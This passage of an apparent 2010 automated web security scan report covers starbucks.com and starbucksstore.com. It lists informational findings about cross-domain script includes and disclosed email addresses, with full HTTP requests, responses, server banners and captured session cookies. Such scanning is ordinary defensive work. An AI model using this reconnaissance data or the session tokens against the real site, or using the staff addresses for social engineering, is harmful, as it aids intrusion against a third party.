Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19530
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:19 GMT
Connection: close

<!--S1--><!--S0-->
<!--INCLUDE VIRTUAL ="/registry/include/funcsRegistry.asp"-->


<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       
       <meta HTTP-EQUIV="Conten
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.89. http://www.starbucksstore.com/starbucks-coffee-tours/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-coffee-tours/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starbucks-coffee-tours/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16772
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:05 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.90. http://www.starbucksstore.com/starbucks-gifts/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-gifts/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starbucks-gifts/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17195
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:38:19 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="d
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

10.91. http://www.starbucksstore.com/starbucks-seasonal/starbucks-seasonal.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /starbucks-seasonal/starbucks-seasonal.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starbucks-seasonal/starbucks-seasonal.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79402
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:43:24 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

11. Email addresses disclosed  previous  next
There are 4 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


11.1. http://www.starbucks.com/customer-service/faqs/coffeehouse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffeehouse

Issue detail

The following email addresses were disclosed in the response:

Request

GET /customer-service/faqs/coffeehouse HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:08 GMT
Connection: close
Content-Length: 57890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<p>Some users are experiencing issues logging into their Starbucks Card accounts. Please email us at starbuckscardmobile@starbucks.com and include your username and the time you experienced the issue to help our tech team isolate the issue.</p>
...[SNIP]...
<a href="mailto:info@mystarbucksidea.com">
...[SNIP]...

11.2. http://www.starbucks.com/customer-service/faqs/shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/shop

Issue detail

The following email address was disclosed in the response:

Request

GET /customer-service/faqs/shop HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:22 GMT
Connection: close
Content-Length: 51351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="mailto:webmaster@starbucks.com">webmaster@starbucks.com</a>
...[SNIP]...

11.3. http://www.starbucks.com/static/js/global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /static/js/global.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/global.js HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e3f5py45fbmdq045dakdnm45; skin=

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 04 Oct 2010 20:52:53 GMT
Accept-Ranges: bytes
ETag: "17df8d1d664cb1:0"
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:12:36 GMT
Content-Length: 30097

/*
hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
<http://cherne.net/brian/resources/jquery.hoverIntent.html>
@param f onMouseOver function || An object with configuration options
@param g onMo
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

11.4. http://www.starbucksstore.com/guestassist/guestassist_jscript.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /guestassist/guestassist_jscript.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /guestassist/guestassist_jscript.js HTTP/1.1
Accept: */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 09 Dec 2009 20:01:41 GMT
Accept-Ranges: bytes
ETag: "b57fbf6ca79ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:11:50 GMT
Content-Length: 24837

//----------------------------------------------------------------------------
//    Filename:        /GuestAssist/guestassist_jscript.js
//    Description:    this file contains the Guest Assistance subject and t
...[SNIP]...
-------------------    --------------- -----------rac                            
       arrSubTopics = new Array(
                       new Array(new Array("", "", "", 0, "order")),
                       new Array(new Array("I need help tracking my order", "orders@starbucksstore.com", "Order Inquiries - Tracking", 1, "order"),                            
                            new Array("I need to cancel or change my order", "orderchanges@starbucksstore.com", "Order Inquiries - Cancellations/Changes", 2, "order"),
                            new Array("I need help with an order I received.", "orders@starbucksstore.com", "Order Inquiry - Fullfillment Issue", 3, "order"),                            
                            new Array("Other", "orders@starbucksstore.com", "Order Inquiries - Other", 4, "order")),
                           
                       new Array(new Array("How do I subscribe to the StarbucksStore newsletter?", "support@starbucksstore.com", "Newsletters - Subscribe", 1, "other"),
                            new Array("I need to change my email address.", "support@starbucksstore.com", "Newsletters - Change Address", 2, "other"),
                            new Array("Other", "support@starbucksstore.com", "Newsletters - Other", 3,    "other")),
                                       
                       new Array(
                               new Array("How do I pay for my order?", "support@starbucksstore.com", "Shopping - Payment Options", 1, "other"),
                           new Array("How do I complete my order?", "support@starbucksstore.com", "Shopping - Checkout", 2, "other"),
                           new Array("Is your website secure?", "support@starbucksstore.com", "Shopping - Security", 3, "other"),
                           new Array("What do you do with my private information?", "support@starbucksstore.com", "Shopping - Privacy", 4, "other"),
                               new Array("Do you have special offers or coupons?", "support@starbucksstore.com", "Shopping - Special Offers/Discounts", 5, "other"),
                               new Array("Other", "support@starbucksstore.com", "Shopping - Other", 6, "other")),

                       new Array(new Array("Shipping options and rates.", "support@starbucksstore.com", "Shipping - Options/Rates", 1, "other"),
                            new Array("Do you ship to international locations?", "support@starbucksstore.com", "Shipping - International", 2, "other"),
                            new Array("Other", "support@starbucksstore.com", "Shipping - Other", 3, "other")),                            
                                                                                           
                       new Array(new Array("How to return products", "returns@starbucksstore.com", "Returns - Process", 1, "returns"),
                            new Array("When will I receive my credit?", "returns@starbucksstore.com", "Returns - Process", 2, "returns"),
                            new Array("Have you received a product I recently returned?", "returns@starbucksstore.com", "Returns - Inquiry", 3, "returns"),                            
                            new Array("Other", "returns@starbucksstore.com", "Returns - Other", 4, "returns")),                
                           
                       new Array(new Array("Questions about coffee origins.", "products@starbucksstore.com", "Product - General Information", 1, "other"),
                            new Array("Where do I find nutrition information?", "products@starbucksstore.com", "Product - General Information", 2, "other"),
                            new Array("Question about coffee.", "info@starbucks.com", "Product - General Information", 3, "other"),
                            new Array("Question about coffee accessories.", "info@starbucks.com", "Product - General Information", 4, "other"),
                            new Array("Question about other Starbucks products.", "info@starbucks.com", "Product - General Information", 5, "other"),
                            new Array("Replacement parts or product warranty.", "info@starbucks.com", "Product - General Information", 6, "other"),
                            new Array("Question about Starbucks Music", "info@starbucks.com", "Product - General Information", 7, "other"),
                            new Array("Other", "products@starbucksstore.com", "Product - Other", 8, "other")),

                       new Array(new Array("Change payment method", "support@starbucksstore.com", "Payment - Change payment method", 1, "other"),
                            new Array("Billing problems", "orders@starbucksstore.com", "Payment - Billing problems", 2, "other"),
                            new Array("Payment options", "support@starbucksstore.com", "Payment - Payment options", 3, "other")),                            

                       new Array(new Array("Why is an account required?", "support@starbucksstore.com", "My Account - Required", 1, "other"),
                            new Array("I forgot my password.", "support@starbucksstore.com", "My Account - Forgot Password", 2, "other"),
                            new Array("How can I change my personal information?", "support@starbucksstore.com", "My Account - Update Email Address", 3, "other"),
                            new Array("How do I create an account?", "support@starbucksstore.com", "My Account - Creating", 4, "other"),
                            new Array("How do I modify my address book?", "support@starbucksstore.com", "My Account - Address Book", 5, "other"),
                            new Array("What do you do with my private information?", "support@starbucksstore.com", "My Account - Privacy", 6, "other"),
                            new Array("May I automatically reorder?", "orders@starbucksstore.com", "My Account - Automatic Reorder", 7, "other"),
                            new Array("Reset my password", "support@starbucksstore.com", "My Account - Reset my password", 8, "other"),
                            new Array("Change my email address", "support@starbucksstore.com", "My Account - Change my email address", 9, "other"),
                            new Array("Help creating an account", "support@starbucksstore.com", "My Account - Help creating an account", 10, "other"),
                            new Array("Modify my address information", "support@starbucksstore.com", "My Account - Modify my address information", 11, "other")),
                                                       
                       new Array(
                            new Array("Error message during checkout.", "support@starbucksstore.com", "Technical Support - Error message during checkout", 1, "other"),
                            new Array("Other error message.", "support@starbucksstore.com", "Technical Support - Other error message", 2, "other"),
                            new Array("Something looks wrong on my screen.", "support@starbucksstore.com", "Technical Support - Something looks wrong on my screen", 3, "other"),
                            new Array("Printing problems.", "support@starbucksstore.com", "Technical Support - Printing problems", 3, "other"),
                            new Array("I cannot complete my order.", "support@starbucksstore.com", "Technical Support - I cannot complete my order", 4, "other"),
                            new Array("I received an error message.", "support@starbucksstore.com", "Technical Support - Error Message", 5, "other"),
                            new Array("Other", "support@starbucksstore.com", "Technical Support - Other", 6, "other")),
                           
                       new Array(
                               new Array("How do I purchase a gift certificate?", "support@starbucksstore.com", "GC - Purchase GC", 1, "other"),
                           new Array("Starbucks card", "info@starbucks.com", "GC - Starbucks Card", 2, "other"),
                           new Array("How do I get coupons?", "support@starbucksstore.com", "GC - Coupons", 3, "other"),
                           new Array("Problem using my gift certificate", "support@starbucksstore.com", "GC - Using GC", 4, "other"),
                               new Array("Problem using my coupon", "support@starbucksstore.com", "GC - Coupon", 5, "other")),

                       new Array(new Array("Where do I send Marketing proposals?", "support@starbucksstore.com", "Business Services - Marketing", 1, "other"),
                            new Array("Where do I send product samples?", "support@starbucksstore.com", "Business Services - Samples", 2, "other"),
                            new Array("Do you have an Affiliate Program?", "support@starbucksstore.com", "Business Services - Affiliate Program", 3, "other"),
                            new Array("Do you have an automatic reorder program?", "support@starbucksstore.com", "Business Services - Automatic Reorder", 4, "other"),
                            new Array("May we advertise on your site?", " advertising@starbucksstore.com", "Business Services - Advertising", 5, "other"),                            
                            new Array("Public Relations/Media Inquiries", "pr@starbucksstore.com", "Public Relations/Media Inquiries", 6, "other")),

                       new Array(new Array("General Information", "info@starbucks.com", "General Information", 1, "other"),
                            new Array("Starbucks grocery products.", "info@starbucks.com", "Starbucks Grocery Products", 2, "other"),
                            new Array("Starbucks card corporate sales", "info@starbucks.com", "Starbucks Card Corporate Sales", 3, "other"),
                            new Array("Starbucks card", "info@starbucks.com", "Starbucks Card General Information", 4, "other"),
                            new Array("International Development & Overseas Partnership Opportunities", "info@starbucks.com", "International Development & Overseas Partnership Opportunities", 5, "other"),                            
                            new Array("Starbucks.com", "info@starbucks.com", "General", 6, "other"),
                            new Array("Retail store feedback", "info@starbucks.com", "Retail Store Feedback", 7, "other"),
                            new Array("International Retail store feedback", "info@starbucks.com", "International Retail Store Feedback", 8, "other"),
                            new Array("Hear Music feedback", "info@starbucks.com", "Hear Music Feedback", 9, "other")),

                       new Array(new Array("I have feedback about a product.", "support@starbucksstore.com", "Feedback - Products", 1, "other"),
                               new Array("I have feedback about this website.", "support@starbucksstore.com", "Feedback - Website", 2, "other"),
                               new Array("I have general feedback.", "support@starbucksstore.com", "Feedback - Other", 3, "other"),
                               new Array("Retail store feedback", "info@starbucks.com", "Retail Store Feedback", 4, "other"),
                               new Array("International Retail store feedback", "info@starbucks.com", "International Retail Store Feedback", 5, "other"),
                               new Array("Hear Music feedback", "info@starbucks.com", "Hear Music Feedback", 6, "other")),
                               
            new Array(new Array("Advertising", "support@starbucksstore.com", "Advertising - General", 1, "other")),

                &nbs